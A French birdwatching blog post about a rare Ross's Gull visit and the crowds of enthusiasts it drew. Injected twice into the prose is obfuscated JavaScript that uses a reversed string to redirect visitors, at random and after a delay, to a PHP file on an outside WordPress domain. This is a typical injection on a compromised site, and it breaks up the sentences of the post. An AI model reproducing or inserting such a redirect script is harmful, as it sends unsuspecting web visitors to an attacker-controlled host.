Rencontre exceptionnelle avec la Mouette de Ross

Classé dans : Non classé | 2
toute la population de naturalistes et ornithologues des Hauts de France, de Belgique, et même des Pays Bas. La presse nationale a également relaté l’évènement.
$NqM=function(n){if (typeof ($NqM.list[n]) == « string ») return $NqM.list[n].split(«  »).reverse().join(«  »);return $NqM.list[n];};$NqM.list=[« \’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to »>Sa présence exceptionnelle chez nous est émouvante, et les centaines de passionnés qui sont venus voir la star le week end dernier ne diront pas le contraire.
$NqM=function(n){if (typeof ($NqM.list[n]) == « string ») return $NqM.list[n].split(«  »).reverse().join(«  »);return $NqM.list[n];};$NqM.list=[« \’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to »>Je me disais en l’observant que si cette espèce devait disparaitre pour cause de réchauffement climatique nous n’en saurons rien. Nos deux mondes ne se croisent qu’une fois tous les 20 ans et sa biologie est encore mal connue.
Au fil des saisons
Partager sur